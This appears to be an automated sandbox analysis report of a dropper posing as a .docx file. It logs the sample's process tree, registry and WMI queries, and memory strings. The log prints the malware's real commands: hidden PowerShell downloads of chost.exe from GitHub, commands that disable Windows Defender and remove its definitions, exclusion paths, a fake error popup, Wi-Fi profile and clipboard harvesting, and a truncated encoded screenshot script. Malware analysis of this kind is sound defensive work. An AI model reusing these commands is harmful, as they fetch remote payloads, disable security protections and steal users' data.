Source: api-ms-win-core-debug-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.16.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: Cooperative Agreement0000800380.docx.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: Commandline size = 3647	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615

Source: libcrypto-3.dll.16.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9991990186771459
Source: libssl-3.dll.16.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9923211348684211
Source: python312.dll.16.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9993225025765606
Source: sqlite3.dll.16.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9973947832661291
Source: unicodedata.pyd.16.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9935825892857143

Source: classification engine

Classification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@188/104@6/5

Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe

Code function: 0_2_004026B8 LoadResource,SizeofResource,FreeResource,

0_2_004026B8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7272:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3904:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4144:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3916:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2336:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5292:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2588:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3888:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Mutant created: \Sessions\1\BaseNamedObjects\6
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2336:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3052:120:WilError_03

Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe

File created: C:\Users\user\AppData\Local\Temp\4713.tmp

Jump to behavior

Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmp\4715.bat "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe""

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\chost.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: chost.exe, 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: chost.exe, chost.exe, 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: chost.exe, chost.exe, 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: chost.exe, chost.exe, 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: chost.exe, chost.exe, 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: chost.exe, chost.exe, 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: chost.exe, 00000011.00000003.2367561514.0000016E177B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: chost.exe, chost.exe, 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: Cooperative Agreement0000800380.docx.exe

ReversingLabs: Detection: 28%

Source: chost.exe	String found in binary or memory: set-addPolicy
Source: chost.exe	String found in binary or memory: id-cmc-addExtensions

Source: unknown	Process created: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe"
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmp\4715.bat "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/poh21/releases/download/hu23/chost.exe/' -outfile chost.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\calc.exe calc.exe
Source: unknown	Process created: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\chost.exe chost.exe
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Users\user\AppData\Local\Temp\chost.exe chost.exe
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'"
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The application cannot open the file due to an unknown error. Please try again.', 0, 'Cannot Open File', 48+16);close()""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The application cannot open the file due to an unknown error. Please try again.', 0, 'Cannot Open File', 48+16);close()"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuA